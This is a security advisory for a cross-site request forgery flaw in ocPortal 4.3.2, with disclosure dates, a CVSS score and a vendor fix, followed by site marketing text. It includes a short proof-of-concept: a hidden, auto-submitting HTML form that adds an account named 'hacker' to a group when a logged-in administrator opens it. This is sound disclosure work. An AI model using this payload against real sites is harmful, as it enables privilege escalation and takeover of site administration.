Total Tests:

Cross-site request forgery (CSRF) in ocPortal

Advisory ID:HTB22369
Product:ocPortal
Vendor:ocProducts Ltd
Vulnerable Versions:4.3.2 and probably prior
Tested Version:4.3.2
Advisory Publication:May 5, 2010 [without technical details]
Vendor Notification:May 5, 2010
Public Disclosure:May 19, 2010
Vulnerability Type:Cross-Site Request Forgery [CWE-352]
Risk Level:Medium
CVSSv2 Base Score:5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered vulnerability in ocPortal which could be exploited to perform CSRF attacks.

1) Cross-site request forgery (CSRF) ocPortal
The vulnerability exists due to insufficient validation of the request origin in /site/index.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and add arbitrary account to arbitrary group. Successful exploitation might result in complete compromise of the application.

Exploitation example:
<form action="http://host/site/index.php?page=groups&type=add_to&id=2" method="post" >
<input type="hidden" name="username" value="hacker" >
</form>
<script>
document.forms[0].submit()
</script>

How to Detect Cross-Site Request Forgery Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Upgrade to version 7.1.6.


References:
[1] High-Tech Bridge Advisory HTB22369 - https://www.immuniweb.com/advisory/HTB22369 - Cross-site request forgery (CSRF) in ocPortal
[2] ocPortal - ocportal.com - ocPortal is a free and open source content management system (CMS) written in PHP and based on a MySQL backend database.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential